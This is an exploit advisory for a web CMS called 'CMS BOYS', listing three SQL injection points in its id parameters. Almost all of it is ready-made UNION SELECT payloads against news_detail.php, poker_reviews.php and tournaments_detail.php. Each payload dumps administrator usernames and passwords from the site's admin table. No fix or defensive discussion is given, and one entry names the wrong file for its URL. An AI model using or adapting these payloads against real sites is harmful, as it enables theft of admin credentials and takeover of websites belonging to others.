/*

Name : CMS BOYS (id) Multiple SQL Injection
WebSite : http://www.cmsboys.com/
Demo : http://www.cmsboys.com/democms/

Author : Hamza 'MizoZ' N.
Email : mizozx@gmail.com

Greetz : Zuka , PR0f.SELLIM , Dyle , Achille Dark3r , geeksec.com

*/

# 1st :

File : news_detail.php , GET : id

[HOST]/[PATH]/news_detail.php?id=[INJECTION]

Exploit :

[HOST]/[PATH]/news_detail.php?id=-15+union+select+1,2,3,4,concat(admin_username,0x3a,admin_password)

+from+admin_table--

# 2nd :

File : news_detail.php , GET : id

[HOST]/[PATH]/poker_reviews.php?id=[INJECTION]

Exploit :

[HOST]/[PATH]/poker_reviews.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat

(admin_username,0x3a,admin_password),12,13+from+admin_table--

# 3th :

File : tournaments_detail.php , GET : id

[HOST]/[PATH]/tournaments_detail.php?id=[INJECTION]

Exploit :

[HOST]/[PATH]/tournaments_detail.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,concat

(admin_username,0x3a,admin_password)+from+admin_table--